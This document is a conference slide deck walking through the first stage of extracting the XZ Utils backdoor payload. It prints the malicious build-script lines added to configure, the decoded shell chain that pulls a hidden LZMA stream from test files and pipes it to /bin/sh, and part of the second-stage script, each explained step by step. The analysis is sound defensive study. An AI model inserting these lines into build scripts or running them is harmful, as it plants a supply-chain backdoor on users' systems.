![Diff snippet of the assignment of the gl_localedir_config variable](https://hackmd.io/_uploads/SJHXHu2F0.png "Diff snippet of the assignment of the `gl_localedir_config` variable")
Line 19895 assigns the value of the `gl_localedir_config` to the following command:
```bash
sed \"r\n\" $gl_am_configmake \
| eval $gl_path_map \
| $gl_localedir_prefix -d 2>/dev/null
```
---
This command is then indirectly run by the shell in line 24108 and 25632:
```diff
@@ -24104,6 +24152,7 @@
# Capture the value of LINGUAS because we need it to compute CATALOGS.
LINGUAS="${LINGUAS-%UNSET%}"
+gl_config_gt="eval \$gl_localedir_config"
_ACEOF
```
```diff
@@ -25629,6 +25682,7 @@
;;
esac
done ;;
+ "build-to-host":C) eval $gl_config_gt | $SHELL 2>/dev/null ;;
"src/scripts/xzdiff":F) chmod +x src/scripts/xzdiff ;;
"src/scripts/xzgrep":F) chmod +x src/scripts/xzgrep ;;
"src/scripts/xzmore":F) chmod +x src/scripts/xzmore ;;
```
---
This weird `sed` command: `sed \"r\n\" $gl_am_configmake`
![image](https://hackmd.io/_uploads/ryDzI_2YC.png)
is essentially `cat $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null`
---
After expanding all the parameter expansion markups:
```sh
cat xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz \
| tr "\t \-_" " \t_\-" \
| xz -d 2>/dev/null
```
```sh!
####Hello####
#U$
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
```
---
The following code sets the XZ Utils source tree path which may not be the working directory the build configuration program runs on:
```bash
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
```
---
In the last portion of the script commands the following commands are executed:
```bash!
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)"
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| eval $i \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
---
```bash
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| ((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939) \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
---
```bash
srcdir="xz-git"
xz_opts=(
# Decompress compressed data
--decompress
# Output decompressed data to the standard output
# device
--stdout
)
xz \
"{xz_opts[@]}" \
"${srcdir}/tests/files/good-large_compressed.lzma"
```
---
The consecutive `head` subshell commands simply:
1. Drop(>/dev/null) 1,024 bytes of the the start of the input stream.
1. Output 2,048 bytes of the start of the input stream.
1. Repeat 1. and 2. 16 times.
1. Drop(>/dev/null) 1,024 bytes of the the start of the input stream.
1. Output 939 bytes of the start of the input stream.
---
Filters the bytes before the 32133 byte.
```bash
tail_opts=(
# Output the content starting with the 32133 byte of the input file
--bytes +31233
)
tail "${tail_opts[@]}"
```
---
Translate the set of characters denoted using octal numbers to another set of characters:
```bash
tr \
"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" \
"\0-\377"
```
Obfuscations to avoid the hidden LZMA1 raw stream being noticed.
---
```bash
xz_opts=(
# Decompress compressed data
--decompress
# Decompresses a _raw_ LZMA1 stream
--format raw
--lzma1
# Output decompressed data to the standard output
# device
--stdout
)
xz "${xz_opts[@]}"
```
---
Surprise, surprise! [Another shell script](https://pastebin.com/xvcM9V9x)!
```bash
P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
...stripped...
```
---
## I gave up \_:(´□`」 ∠):\_
There're a lot of stuff I need to catch up to fully comprehend this script:
* C preprocessor directives
* GAWK
* GNU Autmake
* GNU ld
---
## At least we still have the Internet
![Screenshot](https://hackmd.io/_uploads/rJSGlcbnA.png)
[research!rsc: The xz attack shell script](https://research.swtch.com/xz-script) by [Russ Cox](https://swtch.com/~rsc/)
---
## Integrated update mechanism to replace the backdoor payload
![Screenshot](https://hackmd.io/_uploads/rkTbB5-hR.png)
---
## Extraction logic of the malicious binary code
![Screenshot](https://hackmd.io/_uploads/H1X3N5-hA.png)
---
## Only targeting Debian and RedHat distributions
![Screenshot](https://hackmd.io/_uploads/S11FBqZn0.png)
---
## That's all for today!
For step by step instructions of reproducing this work(to the point I gave up), check out my write-up:
| Write-up | This presentation |
| :-: | :-: |
| ![Loading...](https://hackmd.io/_uploads/Hy2wH2ZhC.png =300x300) | ![Loading...](https://hackmd.io/_uploads/BkynEhb2R.png =300x300) |
<center>Any questions?</center>
<style>
/* 調大旁註文字的字元大小 */
rt{
font-size: 15pt;
}
/* 不限制代碼區塊的高度 */
.reveal pre code{
max-height: 100%;
}
/* 迴避清單的排版美觀問題 */
.reveal .slides{
text-align: left;
}
/* 減少圖片跟圖片間的留白 */
:root{
--r-block-margin: 10px;
--r-heading-margin: 0 0 15px 0;
}
</style>
{"title":"How to extract the XZ backdoor malware payload | UbuCon Asia 2024 talk presentation","description":"Step-by-step process to complete the first step of analysing the XZ backdoor.","breaks":false,"showTags":"true","contributors":"[{\"id\":\"62aab908-4afa-4059-813c-f855a82c2b1d\",\"add\":86953,\"del\":43256}]"}